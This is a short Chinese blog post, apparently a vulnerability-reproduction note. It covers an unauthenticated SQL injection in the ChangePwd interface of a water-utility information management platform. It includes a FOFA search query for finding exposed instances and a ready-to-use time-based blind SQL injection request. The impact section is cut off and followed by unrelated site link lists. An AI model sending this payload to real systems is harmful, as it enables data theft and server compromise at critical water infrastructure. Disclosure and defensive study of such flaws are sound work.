【漏洞复现】潍微科技-水务信息管理平台 ChangePwd SQL注入漏洞

0x01 产品简介

潍微科技-水务信息管理平台主要帮助水务企业实现水质状态监测、管网运行监控、水厂安全保障、用水实时监控以及排放有效监管,确保居民安全稳定用水、环境有效保护,全面提升水务管理效率。

0x02 漏洞概述

潍微科技-水务信息管理平台 ChangePwd 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 测绘语句

fofa: icon_hash="-491165370"

0x04 漏洞复现


GET /Account/ChangePwd?oldpwd=123456&newpwd=123456&conpwd=123456&account=1%27;waitfor%20delay%20%270:0:5%27--+ HTTP/1.1

0x05 影响范围

潍微科

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-15 04:42:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-15 04:42:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-15 04:42:02       82 阅读
  4. Python语言-面向对象

    2024-04-15 04:42:02       91 阅读

热门阅读

  1. C++ 泛型编程 模板

    2024-04-15 04:42:02       36 阅读
  2. rust实现双向队列

    2024-04-15 04:42:02       106 阅读
  3. es6对于Promise 对象的详解(2024-04-11)

    2024-04-15 04:42:02       44 阅读
  4. Leetcode215_数组中的第K个最大元素

    2024-04-15 04:42:02       44 阅读
  5. 算法3:寻找数组的中心下标

    2024-04-15 04:42:02       124 阅读
  6. kubernetes常用命令整理

    2024-04-15 04:42:02       32 阅读
  7. 分布式锁的实现

    2024-04-15 04:42:02       44 阅读
  8. 反射+配置文件+抽象工厂模式

    2024-04-15 04:42:02       41 阅读
  9. 工作流引擎项目解析(二)

    2024-04-15 04:42:02       108 阅读
  10. 【面试八股文之通信协议】

    2024-04-15 04:42:02       40 阅读
  11. Go语言中如何处理goroutine和循环变量

    2024-04-15 04:42:02       36 阅读